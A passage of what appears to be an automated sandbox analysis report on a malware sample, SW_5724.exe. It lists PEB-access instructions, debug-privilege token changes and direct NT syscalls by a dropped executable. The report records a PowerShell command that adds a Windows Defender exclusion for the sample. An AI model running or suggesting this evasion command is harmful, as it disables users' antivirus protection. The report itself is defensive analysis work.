                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8E443 mov eax, dword ptr fs:[00000030h]6_2_01A8E443
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8E443 mov eax, dword ptr fs:[00000030h]6_2_01A8E443
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8E443 mov eax, dword ptr fs:[00000030h]6_2_01A8E443
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4645D mov eax, dword ptr fs:[00000030h]6_2_01A4645D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7245A mov eax, dword ptr fs:[00000030h]6_2_01A7245A
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A507AF mov eax, dword ptr fs:[00000030h]6_2_01A507AF
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B047A0 mov eax, dword ptr fs:[00000030h]6_2_01B047A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF678E mov eax, dword ptr fs:[00000030h]6_2_01AF678E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A727ED mov eax, dword ptr fs:[00000030h]6_2_01A727ED
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A727ED mov eax, dword ptr fs:[00000030h]6_2_01A727ED
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A727ED mov eax, dword ptr fs:[00000030h]6_2_01A727ED
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADE7E1 mov eax, dword ptr fs:[00000030h]6_2_01ADE7E1
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A547FB mov eax, dword ptr fs:[00000030h]6_2_01A547FB
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A547FB mov eax, dword ptr fs:[00000030h]6_2_01A547FB
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5C7C0 mov eax, dword ptr fs:[00000030h]6_2_01A5C7C0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD07C3 mov eax, dword ptr fs:[00000030h]6_2_01AD07C3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8C720 mov eax, dword ptr fs:[00000030h]6_2_01A8C720
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8C720 mov eax, dword ptr fs:[00000030h]6_2_01A8C720
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8273C mov eax, dword ptr fs:[00000030h]6_2_01A8273C
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8273C mov ecx, dword ptr fs:[00000030h]6_2_01A8273C
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8273C mov eax, dword ptr fs:[00000030h]6_2_01A8273C
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACC730 mov eax, dword ptr fs:[00000030h]6_2_01ACC730
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8C700 mov eax, dword ptr fs:[00000030h]6_2_01A8C700
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A50710 mov eax, dword ptr fs:[00000030h]6_2_01A50710
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A80710 mov eax, dword ptr fs:[00000030h]6_2_01A80710
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A58770 mov eax, dword ptr fs:[00000030h]6_2_01A58770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60770 mov eax, dword ptr fs:[00000030h]6_2_01A60770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60770 mov eax, dword ptr fs:[00000030h]6_2_01A60770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60770 mov eax, dword ptr fs:[00000030h]6_2_01A60770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60770 mov eax, dword ptr fs:[00000030h]6_2_01A60770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60770 mov eax, dword ptr fs:[00000030h]6_2_01A60770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60770 mov eax, dword ptr fs:[00000030h]6_2_01A60770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60770 mov eax, dword ptr fs:[00000030h]6_2_01A60770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60770 mov eax, dword ptr fs:[00000030h]6_2_01A60770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60770 mov eax, dword ptr fs:[00000030h]6_2_01A60770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60770 mov eax, dword ptr fs:[00000030h]6_2_01A60770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60770 mov eax, dword ptr fs:[00000030h]6_2_01A60770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60770 mov eax, dword ptr fs:[00000030h]6_2_01A60770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8674D mov esi, dword ptr fs:[00000030h]6_2_01A8674D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8674D mov eax, dword ptr fs:[00000030h]6_2_01A8674D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8674D mov eax, dword ptr fs:[00000030h]6_2_01A8674D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADE75D mov eax, dword ptr fs:[00000030h]6_2_01ADE75D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A50750 mov eax, dword ptr fs:[00000030h]6_2_01A50750
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD4755 mov eax, dword ptr fs:[00000030h]6_2_01AD4755
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92750 mov eax, dword ptr fs:[00000030h]6_2_01A92750
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92750 mov eax, dword ptr fs:[00000030h]6_2_01A92750
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8C6A6 mov eax, dword ptr fs:[00000030h]6_2_01A8C6A6
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A866B0 mov eax, dword ptr fs:[00000030h]6_2_01A866B0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A54690 mov eax, dword ptr fs:[00000030h]6_2_01A54690
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A54690 mov eax, dword ptr fs:[00000030h]6_2_01A54690
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD06F1 mov eax, dword ptr fs:[00000030h]6_2_01AD06F1
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD06F1 mov eax, dword ptr fs:[00000030h]6_2_01AD06F1
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACE6F2 mov eax, dword ptr fs:[00000030h]6_2_01ACE6F2
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACE6F2 mov eax, dword ptr fs:[00000030h]6_2_01ACE6F2
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACE6F2 mov eax, dword ptr fs:[00000030h]6_2_01ACE6F2
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACE6F2 mov eax, dword ptr fs:[00000030h]6_2_01ACE6F2
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8A6C7 mov ebx, dword ptr fs:[00000030h]6_2_01A8A6C7
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8A6C7 mov eax, dword ptr fs:[00000030h]6_2_01A8A6C7
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6E627 mov eax, dword ptr fs:[00000030h]6_2_01A6E627
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A86620 mov eax, dword ptr fs:[00000030h]6_2_01A86620
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A88620 mov eax, dword ptr fs:[00000030h]6_2_01A88620
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5262C mov eax, dword ptr fs:[00000030h]6_2_01A5262C
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACE609 mov eax, dword ptr fs:[00000030h]6_2_01ACE609
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6260B mov eax, dword ptr fs:[00000030h]6_2_01A6260B
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6260B mov eax, dword ptr fs:[00000030h]6_2_01A6260B
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6260B mov eax, dword ptr fs:[00000030h]6_2_01A6260B
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6260B mov eax, dword ptr fs:[00000030h]6_2_01A6260B
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6260B mov eax, dword ptr fs:[00000030h]6_2_01A6260B
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6260B mov eax, dword ptr fs:[00000030h]6_2_01A6260B
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6260B mov eax, dword ptr fs:[00000030h]6_2_01A6260B
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92619 mov eax, dword ptr fs:[00000030h]6_2_01A92619
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8A660 mov eax, dword ptr fs:[00000030h]6_2_01A8A660
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8A660 mov eax, dword ptr fs:[00000030h]6_2_01A8A660
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A82674 mov eax, dword ptr fs:[00000030h]6_2_01A82674
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1866E mov eax, dword ptr fs:[00000030h]6_2_01B1866E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1866E mov eax, dword ptr fs:[00000030h]6_2_01B1866E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6C640 mov eax, dword ptr fs:[00000030h]6_2_01A6C640
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A509AD mov eax, dword ptr fs:[00000030h]6_2_01A509AD
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A509AD mov eax, dword ptr fs:[00000030h]6_2_01A509AD
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD89B3 mov esi, dword ptr fs:[00000030h]6_2_01AD89B3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD89B3 mov eax, dword ptr fs:[00000030h]6_2_01AD89B3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD89B3 mov eax, dword ptr fs:[00000030h]6_2_01AD89B3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADE9E0 mov eax, dword ptr fs:[00000030h]6_2_01ADE9E0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A829F9 mov eax, dword ptr fs:[00000030h]6_2_01A829F9
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A829F9 mov eax, dword ptr fs:[00000030h]6_2_01A829F9
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1A9D3 mov eax, dword ptr fs:[00000030h]6_2_01B1A9D3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE69C0 mov eax, dword ptr fs:[00000030h]6_2_01AE69C0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5A9D0 mov eax, dword ptr fs:[00000030h]6_2_01A5A9D0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5A9D0 mov eax, dword ptr fs:[00000030h]6_2_01A5A9D0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5A9D0 mov eax, dword ptr fs:[00000030h]6_2_01A5A9D0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5A9D0 mov eax, dword ptr fs:[00000030h]6_2_01A5A9D0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5A9D0 mov eax, dword ptr fs:[00000030h]6_2_01A5A9D0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5A9D0 mov eax, dword ptr fs:[00000030h]6_2_01A5A9D0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A849D0 mov eax, dword ptr fs:[00000030h]6_2_01A849D0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE892B mov eax, dword ptr fs:[00000030h]6_2_01AE892B
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD892A mov eax, dword ptr fs:[00000030h]6_2_01AD892A
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACE908 mov eax, dword ptr fs:[00000030h]6_2_01ACE908
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACE908 mov eax, dword ptr fs:[00000030h]6_2_01ACE908
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A48918 mov eax, dword ptr fs:[00000030h]6_2_01A48918
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A48918 mov eax, dword ptr fs:[00000030h]6_2_01A48918
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADC912 mov eax, dword ptr fs:[00000030h]6_2_01ADC912
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A76962 mov eax, dword ptr fs:[00000030h]6_2_01A76962
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A76962 mov eax, dword ptr fs:[00000030h]6_2_01A76962
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A76962 mov eax, dword ptr fs:[00000030h]6_2_01A76962
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A9096E mov eax, dword ptr fs:[00000030h]6_2_01A9096E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A9096E mov edx, dword ptr fs:[00000030h]6_2_01A9096E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A9096E mov eax, dword ptr fs:[00000030h]6_2_01A9096E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADC97C mov eax, dword ptr fs:[00000030h]6_2_01ADC97C
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF4978 mov eax, dword ptr fs:[00000030h]6_2_01AF4978
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF4978 mov eax, dword ptr fs:[00000030h]6_2_01AF4978
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD0946 mov eax, dword ptr fs:[00000030h]6_2_01AD0946
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B24940 mov eax, dword ptr fs:[00000030h]6_2_01B24940
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A50887 mov eax, dword ptr fs:[00000030h]6_2_01A50887
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADC89D mov eax, dword ptr fs:[00000030h]6_2_01ADC89D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8C8F9 mov eax, dword ptr fs:[00000030h]6_2_01A8C8F9
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8C8F9 mov eax, dword ptr fs:[00000030h]6_2_01A8C8F9
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1A8E4 mov eax, dword ptr fs:[00000030h]6_2_01B1A8E4
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7E8C0 mov eax, dword ptr fs:[00000030h]6_2_01A7E8C0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B208C0 mov eax, dword ptr fs:[00000030h]6_2_01B208C0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A72835 mov eax, dword ptr fs:[00000030h]6_2_01A72835
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A72835 mov eax, dword ptr fs:[00000030h]6_2_01A72835
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A72835 mov eax, dword ptr fs:[00000030h]6_2_01A72835
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A72835 mov ecx, dword ptr fs:[00000030h]6_2_01A72835
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A72835 mov eax, dword ptr fs:[00000030h]6_2_01A72835
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A72835 mov eax, dword ptr fs:[00000030h]6_2_01A72835
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF483A mov eax, dword ptr fs:[00000030h]6_2_01AF483A
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF483A mov eax, dword ptr fs:[00000030h]6_2_01AF483A
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8A830 mov eax, dword ptr fs:[00000030h]6_2_01A8A830
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADC810 mov eax, dword ptr fs:[00000030h]6_2_01ADC810
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE6870 mov eax, dword ptr fs:[00000030h]6_2_01AE6870
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE6870 mov eax, dword ptr fs:[00000030h]6_2_01AE6870
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADE872 mov eax, dword ptr fs:[00000030h]6_2_01ADE872
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADE872 mov eax, dword ptr fs:[00000030h]6_2_01ADE872
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A62840 mov ecx, dword ptr fs:[00000030h]6_2_01A62840
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A54859 mov eax, dword ptr fs:[00000030h]6_2_01A54859
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A54859 mov eax, dword ptr fs:[00000030h]6_2_01A54859
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A80854 mov eax, dword ptr fs:[00000030h]6_2_01A80854
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B04BB0 mov eax, dword ptr fs:[00000030h]6_2_01B04BB0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B04BB0 mov eax, dword ptr fs:[00000030h]6_2_01B04BB0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60BBE mov eax, dword ptr fs:[00000030h]6_2_01A60BBE
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60BBE mov eax, dword ptr fs:[00000030h]6_2_01A60BBE
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A58BF0 mov eax, dword ptr fs:[00000030h]6_2_01A58BF0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A58BF0 mov eax, dword ptr fs:[00000030h]6_2_01A58BF0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A58BF0 mov eax, dword ptr fs:[00000030h]6_2_01A58BF0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7EBFC mov eax, dword ptr fs:[00000030h]6_2_01A7EBFC
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADCBF0 mov eax, dword ptr fs:[00000030h]6_2_01ADCBF0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A50BCD mov eax, dword ptr fs:[00000030h]6_2_01A50BCD
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A50BCD mov eax, dword ptr fs:[00000030h]6_2_01A50BCD
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A50BCD mov eax, dword ptr fs:[00000030h]6_2_01A50BCD
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A70BCB mov eax, dword ptr fs:[00000030h]6_2_01A70BCB
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A70BCB mov eax, dword ptr fs:[00000030h]6_2_01A70BCB
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A70BCB mov eax, dword ptr fs:[00000030h]6_2_01A70BCB
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFEBD0 mov eax, dword ptr fs:[00000030h]6_2_01AFEBD0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7EB20 mov eax, dword ptr fs:[00000030h]6_2_01A7EB20
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7EB20 mov eax, dword ptr fs:[00000030h]6_2_01A7EB20
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B18B28 mov eax, dword ptr fs:[00000030h]6_2_01B18B28
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B18B28 mov eax, dword ptr fs:[00000030h]6_2_01B18B28
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACEB1D mov eax, dword ptr fs:[00000030h]6_2_01ACEB1D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACEB1D mov eax, dword ptr fs:[00000030h]6_2_01ACEB1D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACEB1D mov eax, dword ptr fs:[00000030h]6_2_01ACEB1D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACEB1D mov eax, dword ptr fs:[00000030h]6_2_01ACEB1D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACEB1D mov eax, dword ptr fs:[00000030h]6_2_01ACEB1D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACEB1D mov eax, dword ptr fs:[00000030h]6_2_01ACEB1D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACEB1D mov eax, dword ptr fs:[00000030h]6_2_01ACEB1D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACEB1D mov eax, dword ptr fs:[00000030h]6_2_01ACEB1D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACEB1D mov eax, dword ptr fs:[00000030h]6_2_01ACEB1D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B24B00 mov eax, dword ptr fs:[00000030h]6_2_01B24B00
                Source: C:\Users\user\Desktop\SW_5724.exe; Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
                Source: C:\Users\user\Desktop\SW_5724.exe; Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\SW_5724.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe"
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtAllocateVirtualMemory: Direct from: 0x76EF48EC
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtQueryAttributesFile: Direct from: 0x76EF2E6C
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtQuerySystemInformation: Direct from: 0x76EF48CC
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtOpenSection: Direct from: 0x76EF2E0C
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtDeviceIoControlFile: Direct from: 0x76EF2AEC
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtQueryInformationToken: Direct from: 0x76EF2CAC
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtCreateFile: Direct from: 0x76EF2FEC
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtOpenFile: Direct from: 0x76EF2DCC
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtTerminateThread: Direct from: 0x76EF2FCC
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtOpenKeyEx: Direct from: 0x76EF2B9C
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtSetInformationProcess: Direct from: 0x76EF2C5C
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtProtectVirtualMemory: Direct from: 0x76EF2F9C
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtWriteVirtualMemory: Direct from: 0x76EF2E3C
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtNotifyChangeKey: Direct from: 0x76EF3C2C
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtCreateMutant: Direct from: 0x76EF35CC
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtResumeThread: Direct from: 0x76EF36AC
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtMapViewOfSection: Direct from: 0x76EF2D1C
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtQuerySystemInformation: Direct from: 0x76EF2DFC
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtReadFile: Direct from: 0x76EF2ADC
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtDelayExecution: Direct from: 0x76EF2DDC
